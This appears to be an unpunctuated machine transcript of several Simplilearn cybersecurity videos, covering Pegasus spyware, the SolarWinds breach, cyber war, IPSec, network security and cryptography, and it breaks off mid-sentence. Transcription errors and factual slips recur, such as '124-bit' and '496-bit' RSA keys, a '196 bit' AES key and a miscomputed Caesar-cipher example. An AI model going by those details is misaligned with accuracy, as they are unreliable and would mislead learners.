Pegasus stands out is it zeroclick action feature usually in spam emails the malicious code is activated when the user clicks the malware link a user doesn’t need to click the link in the new version of the Pegasus and a few other spyware programs once the message arrives in the inbox of WhatsApp Gmail or any other chat applications the spyware gets activated and everything can be recorded and sent back to the central server the primary issue with being affected by spyware as a victim is detection unlike crypto miners and Trojans spying services usually do not demand many system resources which makes them tough to detect after they have been activated since many devices slow down after a couple of years any kind of performance set due to such spyware is often attributed to poor software longevity by the users they do not check meticulously for any other causes that is causing the slowdown when left unchecked these devices can capture voice and video from the mobile sensors while keeping the owner in the dark let’s take a moment to check if you are well aware of the causes of such attacks how do users fall prey to such spyware programs a by installing untested software B by clicking on the third party links from email and messages C by not keeping their apps and phones updated or D all of the above let us know your answers in the comment section below and we will reveal the correct answer next week but what about the unaffected devices the vulnerable ones while we cannot be certain of our security there are a few things we can do to boost our device be it against Pegasus or the next big spyware on the market let’s say we are safe now and we have the time to take the necessary steps to prevent a spyware attack what are the things we can go for a primary goal must always be to keep our apps and the operating system updated with the latest security patches the vulnerabilities that the exploits target are often discovered by developers from Google and Apple which send the security patches quickly this can be done for individual apps as well so keeping them updated is of utmost importance while the most secure devices have fallen prey to Pegasus as well a security patch from developers may help in minimizing the damage at a later stage or maybe negate the entire spyware platform altogether another big factor is the spread of malware is the trend of sideloading Android applications using APK files downloading such apps from a third party website have no security checks involved and are mostly responsible for adear and spyware invasions on user devices avoiding the sideloading of apps would be a major step in protecting yourself we often receive spam emails or texts from people we may not know on social medias they are accompanied with links that allow malware to creep into our device we should try to follow the trusted websites and not click on any links that redirect us to unknown domains spyware is a controversial segment in governance while the ramifications are pretty extreme in theory it severely impacts user privacy against authoritarian regimes sufficient resources and a contingent plan can alter the false veil of democracy altogether even if our daily life is rather simplistic we must understand that privacy is not about what we have to hide instead it portrays the things we have to protect it stands for everything we have to share with the outside world both rhetorically and literally hey everyone today we look at the hack which took the world by storm and affected multiple governments and corporations the Solar Winds attack the global statistics indicate that upward of 18,000 customers have been affected potentially needing billions to recover the losses incurred before we have a look at this hack make sure to subscribe to our channel and hit the notification bell to never miss an update from Simpler the date is December 8th 2020 fire a global leader in companies specializing in cyber security released a blog post that caught the attention of the entire IT community a software known as Orion which was developed by Solar Winds Incorporated had become a victim of a remote access Trojan or a rat the breach was estimated to be running since the spring of 2020 and went virtually unnoticed for months the reveal sent the developers of the Orion software into a frenzy as they quickly released a couple of hot fixes for their platform in order to mitigate this threat and prevent further damage but how did this come into existence we first need to understand the platform which was responsible for this breach solowins a software company based in Texas United States had developed a management platform known as Orion itering to corporations and governments worldwide orion was responsible for the monitoring and management of IT administration this included managing the client servers virtualization components and even the organization’s network infrastructure that bought the platform solowins claims they have more than 300,000 clients including US government agencies and several Fortune 500 companies this entire chain can be classified as a supply chain attack in this variant of cyber crime the hackers target relatively weaker links in an organization’s chain of control and delivery these are prefilibly services rendered by a third party since there is no direct jurisdiction over it in this case the Orion platform was the primary target the culprit however was software updates the update server for Solowins Orion had a malicious version attached with malware or a Trojan to be precise this was made possible since the code repository that handled the software updates was breached once the update server repository was compromised the source code of the applications became open to modification and malicious code found its way onto the software the remote access Trojan was attached to a potential update nicknamed the Sunburst update this update gave hackers back door access to any client that uses the correct version on its release many clients believed the update to be legitimate since it came from the right source and they had no reason to believe otherwise american government agencies were supposedly hit the hardest as the list of victims included the US departments of homeland security Treasury and Health several private companies like Cisco Nvidia and Intel were compromised according to a list published by the cyber security firm Trusk most of the companies had issues quick updates to fix this vulnerabilities introduced by the software while the actual perpetrators have never been found it is believed that this was an act of crossber corporate espionage conducted by state sponsored hackers either from Russia or China before we move forward let’s take a recap of the things we learned what category of malware was responsible for the Solar Winds hack was it one a virus a remote access Trojan a spyware or a worm let us know your answers in the comment section right away and we will reveal the correct answer in a week coming to possible reparations the Biden government has launched a full investigation on the effects and the repercussions of this breach there are a couple of things that we as consumers must always tend to when working our way through the worldwide web using a password manager is highly recommended which can generate secure alpha numeric passwords you must also use different passwords for different accounts thereby reducing the chances of a single point of failure should one of those accounts get breached usage of two-factor authentication applications is also encouraged since it acts as a safety net if hackers directly get a hold of our credentials clicking on unknown links transmitted via emails is also a strict no as is installing applications from unverified sources the Solar Winds hack is estimated to cost the parent company nearly $18 million as reparations making it one if not the biggest hacks in cyerspace history as recently as of July 2021 the hackers accessed some US attorneys Microsoft 365 email accounts as part of the attack criminal organizations like the FBI and CIA are determined to figure out the culprits responsible for this debacle however the intricacy and the full extent of the breach makes it a way more complicated job than it looks on paper the day is 26th February 2022 the world is hit with breaking news that Russian state TV channels have been hacked by Anonymous a activist collective and movement who have made a name taking part in multiple cyber wars in the past decade this was in response to the Russian aggression on Ukrainian territory in the hopes of annexation anonymous hacked the Russian state TV networks to combat propaganda in Russia and highlight the damage to life meed out by the Kremlin in Ukraine they also hacked 120,000 Russian troops personal information and the Russian central bank stealing 35,000 files this served as a clear indicator of how cyber war can change the momentum in battle something which people had never seen so closely so what is cyber war a digital assault or series of strikes or hacks against a country is sometimes referred to as a cyber war it has the ability to cause havoc on government and civilian infrastructure as well as disrupt essential systems causing state harm and even death in this day and age the internet plays a bigger role than just watching videos and learning content it’s where you have your personal data and carry financial transactions so rather than resorting to physical violence cyber wars become the new means to cause havoc considering the vulnerability of the data passing through the internet in most circumstances cyber warfare involves the nation state attacking another in certain cases the assaults are carried out by terrorist organizations or non-state actors pursuing a hostile nation’s aim in June 2021 Chinese hackers targeted organizations like Verizon to secure remote access to their networks stuckset was a computer worm designed to attack Iran’s nuclear facilities but evolved and expanded to many other industrial and energy producing sites in 2010 since the definition of cyber war is so vague applying rules and sanctions based on digital assault is even tougher making the field of cyber warfare a lawless land not bound by any rules or policies there are multiple ways in which these attacks can be carried out a major category of cyber attack is espionage espionage entails monitoring other countries to steal critical secrets this might include compromising vulnerable computer systems with botn nets or spear fishing attempts before extracting sensitive data in cyber warfare the next weapon in cyber war is sabotage government agencies must identify sensitive data and its dangers if it is exploited insider threats such as disgruntled or irresponsible personnel or government staff with ties to the attacking country can be used by hostile countries or terrorists to steal or destroy information by overwhelming a website with bogus requests and forcing it to handle them denial of service attacks prohibit real users from accessing it attacking parties may use this form of assault to disrupt key operations and systems and prevent citizens military and security officials and research organizations from accessing sensitive websites but what benefits does cyber war offer in contrast to traditional physical warfare the most important advantage is the ability to conduct attacks from anywhere globally without having to travel thousands of miles as long as the attacker and target are connected to the internet organizing and launching cyber wars is relatively less tedious than physical warfare people living in or battling for a country are subjected to propaganda attacks in an attempt to manipulate their emotions and thoughts digital infrastructure is highly crucial today’s modern world starting from communication channels to secure storage servers crippling a country’s footprint and control on the internet is very damaging but what are some of the ways we as citizens protect ourselves in the case of a cyber war in the unfortunate event that your country is involved in warfare be sure to fact check every piece of information and follow only trusted sources in that frame of time even conversations online should be limited to a need to know basis considering propaganda campaigns have the power to influence the tide of war drastically it is highly crucial to follow basic security guidelines to secure our devices like regularly updating our operating systems occasionally running full system antivirus scans etc if your country or organization is being attacked having devices segregated in a network goes a long way in bolstering security try to avoid sharing a lot of personal data online in this era of Instagram and Facebook divulging private information can be detrimental to keeping a secure firewall for your data the more information an attacker has access to the higher his chances of being able to devise a plan to infiltrate defenses and if you’re someone who is interested in building a career in cyber security that is by graduating from the best universities or a professional who elicits to switch careers with cyber security by learning from the experts then try giving a shot to simply learn post-graduate programming cyber security with modules from the MIT Schwarzman College of Engineering and the course link is mentioned in the description box that will navigate you to the course page where you can find a complete overview of the program being offered during data transmission there are various external factors which can affect the transmission of data over a network channel to prevent such cases from happening we use internet protocol security which we’ll be discussing in this session on IPSec explain hi guys and welcome to yet another interesting video by simply learn but before we begin if you love watching tech videos subscribe to our channel and hit the bell icon to miss an update from us now without further ado let’s take a look at the agenda for this session to begin with we will look into what is IPSec continuing with why do we use IPSec in a network followed by components of IPSec modes of IP security as for the last topic we will look into working steps involved in IP security let’s begin with the first setting that is what is IPSec ipsec internet protocol security is defined as a set of framework and protocol to ensure data transmission over a network this protocol was initially defined of two main protocols for data security over a network channel which were authentication header which is responsible for data integrity and anti-replay services and the second protocol is encapsulating security payload in short ESP which includes data encryption and data authentication now let’s move on to the next setting that is why do we use IPSec in a network ipsec is used to secure sensitive data and information such as company data clinical data bank data and various sensitive information regarding an institution which are used during data transmission over a network channel the use of VPNs that are virtual private networks and apply IPSec protocols to encrypt the data for end to-end transmission let’s continue with why do we use IPSec services ipsec is also used to encrypt data for application layer in the OSI model and provide security for sharing data over network routers and data authentication let’s take a look at the working of IPSC services to begin with we have two different system system one and system two which will establish a network channel and then the encryption of data will takes place when one host will share the data to the second host during this IP sec services will secure the data that is to be transferred over the network channel by applying router encryption and authentication now let’s move on to the next topic that is components of IPSec the IPSec services comprises of multiple protocols that ensure the data transmission over the network channel the first one is encapsulating security payload protocol in short ESP this protocol of IP security provides data encryption and authentication services and it also authenticates and encrypt the data packet in the transmission channel moving on we have authentication header in short ah similar to ESP the authentication header also provides all the security services but it does not encrypt the data it also protects the IP packet and adds additional headers to the packet header the modified IP datagramgram looks this way where the IP components are included at the second position the seventh position and the sixth position along with the authentication of data services over the network channel moving on we have internet key exchange IKE this protocol provides protection for content data and also changes the attribute of the original data to be shared by implementing SHA and MD5 algorithms they also check the message for authentication and then only is forwarded to the receiver side for example this is the original data packet we are used to with IP header part TCP UDP and data whereas this is the modified IPSC data packet where TSP header is added between IP header and the TCP protocol now let’s move on to the next heading that is modes of IPSec there are basically two types of IPSec modes available for data transmission over the network channel where the first one is tunnel mode this mode of transmission is used to secure gateway to gateway data it is applied when the final destination of the data is to be connected to a sender site through a connection gateway over the internet for example we have two host host A and host B through the host A we are sending a message to host B which will pass through a gateway at host A point and it passes through a gateway to host B this is a basic format for gateway to gateway data transmission and the given IP datagramgram format is used for tunnel mode now let’s move on to the second mode of IPSec that is transport mode this mode of IPSec is used to protect protocols like TCP or UDP and is used to ensure end to end communication unlike tunnel mode the transport mode data at authentication header and encapsulating security payload for security purpose in the IP header this is the modified IP datagramgram for transport mode the point to be noted is the IPSec header is always added between IP header and TCP header now let’s move on to the last setting for this session on IPSec that is the working steps involved in IP security in general there are five steps involved in the working of IPSec to ensure data transmission over a network channel the first step is host recognition in the first step the host system will check if the packet is to be transmitted or not by automatically triggering the security policy for the data which is implemented by the sender side for proper encryption then the second step is known as IKE phase one in this step the two host devices the sender and the receiver side will authenticate each other to establish a secure network channel it is comprised of two modes the main mode this provides much better security with a proper time limit and the second mode known as aggressive mode as the name suggests it establishes the IPSC protocol much faster in comparison to main mode let’s move on to the third step which is IKE phase 2 after the second step the host decide the type of cryptography algorithm to apply over the session in the network channel and the secret key for the algorithm to be used to encrypt the data for transmission then we have IPSec transmission this step involves the actual transfer of data over the network channel using various protocols used in IPSec security which are implemented under the tunnel condition and the last step is IPSec termination after the completion of data exchange or session timeout the IPSec tunnel is terminated and the security key established is discarded by both the host system network security is a set of technologies that protects the usability and integrity of a company’s infrastructure by preventing the entry or proliferation within a network it architecture comprises of tools that protect the network itself and the applications that run over it effective network security strategies employ multiple lines of defense that are scalable and automated each defensive layer here enforces a set of security policies which are determined by the administrator beforehand this aims at securing the confidentiality and accessibility of the data and the network the every company or organization that handles a large amount of data has a degree of solutions against many cyber threats the most basic example of network security is password protection it has the network the user chooses recently network security has become the central topic of cyber security with many organizations involving applications from people with skills in this area it is crucial for both personal and professional networks most houses with highspeed internet have one or more wireless routers which can be vulnerable to attacks if they’re not adequately secured data loss theft and sabotage risk may be decreased with the usage of a strong network security system the workstations are protected from hazardous spyware thanks to network security additionally it guarantees the security of the data which is being shared over a network by dividing information into various sections encrypting these portions and transferring them over separate pathways network security infrastructure offers multiple levels of protection to thwart man-in-the-middle attacks preventing situations like eavesdropping among other harmful attacks it is becoming increasingly difficult in today’s hyperconnected environment as more corporate applications migrate to both public and private clouds additionally modern applications are also frequently virtualized and dispersed across several locations some outside the physical control of the IT team network traffic and infrastructure must be protected in these cases since assaults on businesses are increasing every single day we now understood the basics of network security but we need to understand how network security works in the next section in slightly more detail network security revolves around two processes authentication and authorization the first process which is authentication is similar to access path which ensure that only those who have the right to enter a building in other words authentication checks and verifies that it is indeed the user belonging to the network which is trying to access or enter it thereby preventing unauthorized intrusions next comes authorization this process decides the level of access provided to the recently authenticated user for example network admin needs access to the entire network whereas those working within it probably need access to only certain areas within the network based on the network users role the process of determining the level of access or permission level is known as authorization today’s network architecture is complex and faces a threat environment that is always changing and attackers that are always trying to find and exploit vulnerabilities these vulnerabilities can exist in many areas including devices data applications users and locations for this reason many network security management tools and applications are in use today that address individual threats when just a few minutes of downtimes can cause widespread disruption and massive damage to an organization’s bottom line and reputation it is essential that these protection measures are in place beforehand now that you know a little about network security and its working let’s cover the different types of network security the fundamental tenant of network security is the layering of protection for massive networks and stored data that ensure the acceptance of rules and regulations as a whole there are three types the first of which is physical security the next being technical and the third being administrative let’s look into physical security first this is the most basic level that includes protecting data and network to unauthorized personnel from acquiring control over the confidentiality of the network this include external peripherals and routers that might be used for cable connections the same can be achieved by using devices like biometric systems physical security is critical especially for small businesses that do not have many resources to devote to security personnel and the tools as opposed to large firms when it comes to technical network security it focuses mostly on safeguarding data either kept in the network or engaged in network transitions this kind fulfills two functions one is defense against unauthorized users the other is a defense against malleent actions the last category is administrative this level of network security protects user behavior like how the permission has been granted and how the authorization process takes place this also ensures the level of sophistication the network might need to protect it through all the attacks this level also suggests necessary amendments that have to be done to the infrastructure i think that’s all the basics that we need to cover on network security in which our next topic we’re going to go through two mediums of network security which are the transport layer and the application layer so transport layer is a way to secure information as it is carried over the internet with users browsing websites emails instant messaging etc tls aims to provide a private and secure connection between a web browser and a website server it does this with the cryptographic handshake between two systems using public key cryptography the two parties through the connection and exchange a secret token and once each machine validates this token it is used for all communications the connection employs lighter symmetric cryptography to save bandwidth and processing power since the application layer is the closest layer to the end user it provides hackers with the largest threat surface poor app layer security can lead to performance and stability issues data theft and in some cases the network being taken down examples of application layer attacks include distributed denial of service attacks or DDoS attacks HTTP floods HQ injections cross-sight scripting etc most organizations have an arsenal of application layer security protections to combat these and more such as web application firewalls secure web gateway services etc now that we have the theory behind network security has been covered in detail let us go through some of the tools that can be used to enforce these network security policies the first tool to be covered in this section is a firewall a firewall is a type of network security device that keeps track of incoming and outgoing network traffic and it decides which traffic to allow or deny in accordance to a set of security rules for more than 25 years firewalls have served as network security’s first line of defense they provide a barrier between trustworthy internal protected and regulated networks from shady external networks like the internet at some points the next tool which can be used to bolster network security is a virtual private network or VPN for short it’s an encrypted connection between a device and a network via the internet the encrypted connection aids the secure transmission of sensitive data it makes it impossible for unauthorized parties to eaves drop on the traffic and enables remote work for the user the usage of VPN technology is common in both corporate and personal networks next we cover the importance of intrusion prevention systems in network security or IPS frameworks an intrusion prevention system is a network security tool that continually scans a network for harmful activity and responds to it when it does occur by reporting blocking or discarding it it can be either hardware or software it’s more sophisticated than an intrusion detection system or an IDS framework which can just warn an administrator and merely identify harmful activities while in the case of an IPS it actually takes against that activity the next tool in this section and the final one are going to be behavioral analytics behavioral analytics focus more on the statistics that are being carried over and stored through months and years of usage once some kind of similar pattern is noted but the IT administrator can detect some kind of attack the similar attacks can be stopped and the security can be further enhanced now that we have covered all that we need to know about network security the necessary tools it required types etc let’s go through the benefits of network security as a for the first which is protection against external threats the objective for cyber assaults can be as varied as the defenders themselves although they’re typically initiated for financial gain whether they are industrial spies activists or cyber criminals these bad actors all have one thing in common which is how quick clever and covert the attacks are getting a strong cyber security posture that considers routine software updates may assist firms in identifying and responding to the abuse techniques tools and the common entry points the next benefit is protection against internal threats the human aspect continues to be the cyber security systems weakest link insider risk can originate from current or former workers third party vendors or even trusted partners and they can be unintentional careless or downright evil aside from that the rapid expansion of remote work and the personal devices used for business purposes while even IoT devices in remote locations can make it easier for these kind of threats to go undetected until it’s too late however by proactively monitoring networks and managing access these dangers may be identified and dealt with before they become expensive disasters the third benefit is increased productivity it is nearly impossible for employees to function when networks and personal devices are slowed to a crawl by viruses and other cyber attacks during the operation of website and for the company to run you may significantly minimize violations and the amount of downtime required to fix the breach by implementing various cyber security measures such as enhanced firewalls virus scanning and automatic backups employee identification of possible email fishing schemes suspicious links and other malicious criminal activities can also be aided by education and training another benefit is brand trust and reputation customer retention is one of the most crucial elements in business development customers today place a premium on maintaining brand loyalty through a strong cyber security stance since this is the fastest way to get other businesses back get referrals and sell more tickets overall additionally it helps manufacturers get on the vendor list with bigger companies as a part of the supply chain which is only as strong as its weakest link this opens possibilities for potential future endeavors and development with the rise in censorship and general fear over privacy loss consumer security is at an all-time high risk technology has made our life so much easier while putting up a decent target on our personal information it is necessary to understand how to simultaneously safeguard our data and be up to date with the latest technological developments maintaining this balance has become easier with cryptography taking its place in today’s digital world so hey everyone this is Bever from SimplyLearn and welcome to this video on cryptography but before we begin if you love watching tech videos subscribe to our channel and hit the bell icon to never miss an update from Simply Learn so here’s a story to help you understand cryptography meet an wanted to look for a decent discount on the latest iPhone she started searching on the internet and found a rather shady website that offered a 50% discount on the first purchase once Anne submitted her payment details a huge chunk of money was withdrawn from her bank account just moments after devastated and quickly realized she had failed to notice that the website was an HTTP web page instead of an HTTPS one the payment information submitted was not encrypted and it was visible to anyone keeping an eye including the website owner and hackers had she used a reputed website which has encrypted transactions and employs cryptography a iPhone enthusiast could have avoided this particular incident this is why it’s never recommended to visit unknown websites or share any personal information on them now that we understand why cryptography is so important let’s take a look at the topics to be covered today we take a look into what cryptography is and how it works we learn where cryptography is being used in our daily lives and how we are benefiting from it then we will understand the different types of cryptography and their respective uses moving on we will look at the usage of cryptography in ancient history and a live demonstration of cryptography and encryption in action let’s now understand what cryptography is cryptography is the science of encrypting or decrypting information to prevent unauthorized access we transform our data and personal information so that only the correct recipient can understand the message as an essential aspect of modern data security using cryptography allows the secure storage and transmission of data between willing parties encryption is the primary route for employing cryptography by adding certain algorithms to jumble up the data decryption is the process of reversing the work done by encrypting information so that the data becomes readable again both of these methods form the basis of cryptography for example when simply learn is jumbled up or changed in any format not many people can guess the original word by looking at the encrypted text the only ones who can are the people who know how to decrypt the coded word thereby reversing the process of encryption any data pre- encryption is called plain text or clear text to encrypt the message we use certain algorithms that serve a single purpose of scrambling the data to make them unreadable without the necessary tools these algorithms are called ciphers they are a set of detailed steps to be carried out one after the other to make sure the data becomes as unreadable as possible until it reaches the receiver we take the plain text pass it to the cipher algorithm and get the encrypted data this encrypted text is called the cipher text and this is the message that is transferred between the two parties the key that is being used to scramble the data is known as the encryption key these steps that is the cipher and the encryption key are made known to the receiver who can then reverse the encryption on receiving the message unless any third party manages to find out both the algorithm and the secret key that is being used they cannot decrypt the messages since both of them are necessary to unlock the hidden content wonder what else we would lose if not for cryptography any website where you have an account can read your passwords important emails can be intercepted and their contents can be read without encryption during the transit more than 65 billion messages are sent on WhatsApp every day all of which are secured thanks to end-to-end encryption there is a huge market opening up for cryptocurrency which is possible due to blockchain technology that uses encryption algorithms and hashing functions to ensure that the data is secure if this is of particular interest to you you can watch our video on blockchain the link of which will be in the description of course there is no single solution to a problem as diverse as explained there are three variants of how cryptography works and is in practice they are symmetric encryption asymmetric encryption and hashing let’s find out how much we have understood until now do you remember the difference between a cipher and cipher text leave your answers in the comments and before we proceed if you find this video interesting make sure to give it a thumbs up before moving ahead let’s look at symmetric encryption first symmetric encryption uses a single key for both the encryption and decryption of data it is comparatively less secure than asymmetric encryption but much faster it is a compromise that has to be embraced in order to deliver data as fast as possible without leaving information completely vulnerable this type of encryption is used when data rests on servers and identifies personnel for payment applications and services the potential drawback with symmetric encryption is that both the sender and receiver need to have the same secret key and it should be kept hidden at all times caesar cipher and machine are both symmetric encryption examples that we will look into further for example if Alice wants to send a message to Bob she can apply a substitution cipher or a shift cipher to encrypt the message but Bob must be aware of the same key itself so he can decrypt it when he finds it necessary to read the entire message symmetric encryption uses one of the two types of ciphers stream ciphers and block ciphers block ciphers break the plain text into blocks of fixed size and use the key to convert it into cipher text stream ciphers convert the plain text into cipher text one bit at a time instead of resorting to breaking them up into bigger chunks in today’s world the most widely used symmetric encryption algorithm is AES 256 that stands for advanced encryption standard which has a key size of 256 bit with 128 bit and 196 bit key sizes also being available other primitive algorithms like the data encryption standard that is the dees the triple data encryption standard 3DES and blowfish have all fallen out of favor due to the rise of AES aes chops ups the data into blocks and performs 10 plus rounds of obscuring and substituting the message to make it unreadable asymmetric encryption on the other hand has a double whammy at its disposal there are two different keys at play here a public key and a private key the public key is used to encrypt information pre-transit and a private key is used to decrypt the information postrit if Alice wants to communicate with Bob using asymmetric encryption she encrypts the message using Bob’s public key after receiving the message Bob uses his own private key to decrypt the data this way nobody can intercept the message in between transmissions and there is no need for any secure key exchange for this to work since the encryption is done with a public key and the decryption is done with a private key that no one except Bob has access to both the keys are necessary to read the full message there is also a reverse scenario where we can use a private key for encryption and the public key for decryption a server can sign non-confidential information using its private key and anyone who has its public key can decrypt the message this mechanism also proves that the sender is authenticated and there is no problem with the origin of the information rsa encryption is the most widely used asymmetric encryption standard it is named after its founders Revest Shamir and Edelman and it uses block ciphers that separate the data into blocks and obscure the information widely considered the most secure form of encryption albeit relatively slower than AES it is widely used in web browsing secure identification VPNs emails and chat applications with so much hanging on the keys secrecy there must be a way to transmit the keys without others reading our private data many systems use a combination of symmetric encryption and asymmetric encryption to bolster security and match speed at the same time since asymmetric encryption takes longer to decrypt large amounts of data the full information is encrypted using a single key that is symmetric encryption that single key is then transmitted to the receiver using asymmetric encryption so you don’t have to compromise either way another route is using the defy helman key exchange which relies on a one-way function and is much tougher to break into the third variant of cryptography is termed as hashing hashing is a process of scrambling a piece of data beyond recognition it gives an output of fixed size which is known as the hash value of the original data or just hash in general the calculations that do the job of messing up the data collection form the hash function they are generally not reversible without resilient brute force mechanisms and are very helpful when storing data on website servers that need not be stored in plain text for example many websites store your account passwords in a hashed format so that not even the administrator can read your credentials when a user tries to login they can compare the entered password’s hash value with the hash value that is already stored on the servers for authentication since the function will always return the same value for the same input cryptography has been in practice for centuries julius Caesar used a substitution shift to move alphabets a certain number of spaces beyond their place in the alphabet table a spy can’t decipher the original message at first glance for example if he wanted to pass confidential information to his armies and decides to use a substitution shift of plus two A becomes C B becomes D and so on the word attack when passed through a substitution shift of plus three becomes dwwdefn this cipher has been appropriately named the Caesar cipher which is one of the most widely used algorithms the enigma is probably the most famous cryptographic cipher device used in ancient history it was used by the Nazi German armies in the world wars they were used to protect confidential political military and administrative information and it consisted of three or more rotors that scrambled the original message depending on the machine state at that time the decryption is similar but it needs both machines to stay in the same state before passing the cipher text so that we receive the same plain text message let’s take a look at how our data is protected while we browse the internet thanks to cryptography here we have a web-based tool that will help us understand the process of RSA encryption we see the entire workflow from selecting the key size to be used until the decryption of the cipher text in order to get the plain text back as we already know RSA encryption algorithm falls under the umbrella of asymmetric key cryptography that basically implies that we have two keys at play here a public key and a private key typically the public key is used by the sender to encrypt the message and the private key is used by the receiver to decrypt the message there are some occasions when this allocation is reversed and we will have a look at them as well in RSA we have the choice of key size we can select any key from a 512 bit to 124 bit all the way up to a 496 bit key the longer the key length the more complex the encryption process becomes and thereby strengthening the cipher text although with added security more complex functions take longer to perform the same operations on similar size of data we have to keep a balance between both speed and strength because the strongest encryption algorithms are of no use if they cannot be practically deployed on systems around the world let’s take a 124-bit key over here now we need to generate the keys this generation is done by functions that operate on passphrases the tool we are using right now generates the pseudo random keys to be used in this explanation once we generate the keys you can see the public key is rather smaller than the private key which is almost always the case these two keys are mathematically linked with each other they cannot be substituted with any other key and in order to encrypt the original message or decrypt the cipher text this pair must be kept together the public key is then sent to the sender and the receiver keeps the private key with himself in this scenario let’s try and encrypt a word simply learn we have to select if the key being used for encryption is either private or public since that affects the process of scrambling the information since we are using the public key over here let’s select the same and copy it and paste over here the cipher we are using right now is plain RSA there are some modified ciphers with their own pros and cons that can also be used provided we use it on a regular basis and depending on the use case as well once we click on encrypt we can see the cipher text being generated over here the pseudo random generating functions are created in such a way that a single character change in the plain text will trigger a completely different cipher text this is a security feature to strengthen the process from brute force methods now that we are done with the encryption process let’s take a look at the decryption part the receiver gets this cipher text from the sender with no other key or supplement he or she must already possess the private key generated from the same pair no other private key can be used to decrypt the message since they are mathematically linked we paste the private key here and select the same the cipher must always so be the same used during the encryption process once we click decrypt you can see the original plain text we had decided to encrypt this sums up the entire process of RSA encryption and decryption now some people use it the other way around we also have the option of using the private key to encrypt information and the public key to decrypt it this is done mostly to validate the origin of the message since the keys only work in pairs if a different private key is used to encrypt the message the public key cannot decrypt it conversely if the public key is able to decrypt the message it must have been encrypted with the right private key and hence the rightful owner here we just have to take the private key and use that to encrypt the plain text and select the same in this checkbox as well you can see we have generated a completely new cipher text this cipher text will be sent to the receiver and this time we will use the public key for decryption let’s select the correct checkbox and decrypt and we still get the same output now let’s take a look at practical example of encryption in the real world we all use the internet on a daily basis and many are aware of the implications of using unsafe websites let’s take a look at Wikipedia here pretty standard HTTPS website where the edge stands for secured let’s take a look at how it secures that data wireshark is the world’s foremost and most widely used network protocol analyzer it lets you see what’s happening on your network at a microscopic level and we are going to use the software to see the traffic that is leaving our machine and to understand how vulnerable it is since there are many applications running in this machine let’s apply a filter that will only show us the results related to Wikipedia [Music] let’s search for something that we can navigate the website with okay once we get into it a little you can see some of the requests being populated over here let’s take a look at the specific request these are the data packets that basically transport the data from our machine to the internet and vice versa as you can see there’s a bunch of gibberish data here that doesn’t really reveal anything that we searched or watched similarly other secured websites function the same way and it is very difficult if at all possible to snoop on user data this way to put this in perspective let’s take a look at another website which is a HTTP web page this has no encryption enabled from the server end which makes it vulnerable to attacks there is a login form here which needs legitimate user credentials in order to grant access let’s enter a random pair of credentials these obviously won’t work but we can see the manner of data transfer unsurprisingly we weren’t able to get into the platform instead we can see the data packets let’s apply a similar filter that will help us understand what request this website is sending these are the requests being sent by the HTTP login form to the internet if we check here you see whatever username and password that we are entering we can easily see it with the wireshark now we used a dummy pair of credentials if we select the right data packet we can find a correct credentials if any website had asked for a payment information or a legitimate credentials it would have been really easy to get a hold of these to reiterate what we have already learned you must always avoid HTTP websites and just unknown or not trustworthy websites in general because the problem we saw here is just the tip of the iceberg even though cryptography has managed to lessen the risk of cyber attacks it is still prevalent and we should always be alert to keep ourselves safe online there are two types of encryption in cryptography symmetric key cryptography and asymmetric key cryptography both of these categories have their pros and cons and differ only by the implementation today we are going to focus exclusively on symmetric key cryptography let us have a look at its applications in order to understand its importance better this variant of cryptography is primarily used in banking applications where personally identifiable information needs to be encrypted with so many aspects of banking moving onto the internet having a reliable safety net is crucial symmetric cryptography helps in detecting bank fraud and boost the security index of these payment gateways in general they are also helpful in protecting data that is not in transit and rest on servers and data centers these centers house a massive amount of data that needs to be encrypted with a fast and efficient algorithm so that when the data needs to be recalled by the respective service there is the assurance of minor to no delay while browsing the internet we need symmetric encryption to browse secure HTTPS websites so that we get an all-around protection it plays a significant role in verifying website server authenticity exchanging the necessary encryption keys required and generating a session using those keys to ensure maximum security this helps us in preventing the rather insecure HTTP website format so let us understand how symmetric key cryptography works first before moving on to the specific algorithms symmetric key cryptography relies on a single key for the encryption and decryption of information both the sender and receiver of the message need to have a pre-shared secret key that they will use to convert the plain text into cipher text and vice versa as you can see in the image the key used for encryption is the same key needed for decryptting the message at the other end the secret key shouldn’t be sent along with the cipher text to the receiver because that would defeat the entire purpose of using cryptography key exchange can be done beforehand using other algorithms like the defy helman key exchange protocol for example for example if Paul wants to send a simple message to Jane they need to have a single encryption key that both of them must get secret to prevent snooping on by malicious actors it can be generated by either one of them but must belong to both of them before the messages start flowing suppose the message I am ready is converted into cipher text using a specific substitution cipher by Paul in that case Jane must also be aware of the substitution shift to decrypt the cipher text once it reaches her irrespective of the scenario where someone manages to grab the cipher text mid-transit to try and read the message not having the secret key renders everyone helpless looking to snoop in the symmetric key algorithms like the data encryption standard have been in use since the 1970s while the popular ones like the EES have become the industry standard today with the entire architecture of symmetric cryptography depending on the single key being used you can understand why it’s of paramount importance to keep it secret on all occasions the side effect of having a single key for the encryption and decryption is it becomes a single point of failure anyone who gets their hand on it can read all the encrypted messages and do so mainly without the knowledge of the sender and the receiver so it is the priority to keep the encryption and decryption key private at all times should it fall into the wrong hands the third party can send messages to either the sender or the receiver using the same key to encrypt the message upon receiving the message and decrypting it with the key it is impossible to guess its origin if the sender somehow

    transmits the secret key along with the cipher text anyone can intercept the package and access the information consequently this encryption category is termed private key cryptography since a big part of the data’s integrity is riding on the promise that the users can keep the key secret this terminology contrasts with asymmetric key cryptography which is called public key cryptography because it has two different keys at play one of which is public provided we manage to keep the keys secret we still have to choose what kind of ciphers we want to use to encrypt this information in symmetric key cryptography there are broadly two categories of ciphers that we can employ let us have a look stream ciphers are the algorithms that encrypt basic information one bit at a time it can change depending on the algorithm being used but usually it relies on a single bit or bite to do the encryption this is a relatively quicker alternative considering the algorithm doesn’t have to deal with blocks of data at a single time every piece of data that goes into the encryption can and needs to be converted into binary format in stream ciphers each binary digit is encrypted one after the other the most popular ones are the RC4 salsa and Panama the binary data is passed through an encryption key which is a randomly generated bitstream upon passing it through we receive the cipher text that can be transferred to the receiver without fear of man-in-the-middle attacks the binary data can be passed through an algorithmic function it can have either XR operations as it is most of the time or any other mathematical calculations that have the singular purpose of scrambling the data the encryption key is generated using the random bitstream generator and it acts as a supplement in the algorithmic function the output is in binary form which is then converted into the decimal or hexodimal format to give our final cipher text on the other hand block ciphers dissect the raw information into chunks of data of fixed size the size of these blocks depend on the exact cipher being used a 128 bit block cipher will break the plain text into blocks of 128 bit each and encrypt those blocks instead of a single digit once these blocks are encrypted individually they are chained together to form a final cipher text block ciphers are much slower but they are more tamperproof and are used in some of the most widely used algorithms employed today just like stream ciphers the original cipher text is converted into binary format before beginning the process once the conversion is complete the blocks are passed through the encryption algorithm along with the encryption key this would provide us with the encrypted blocks of binary 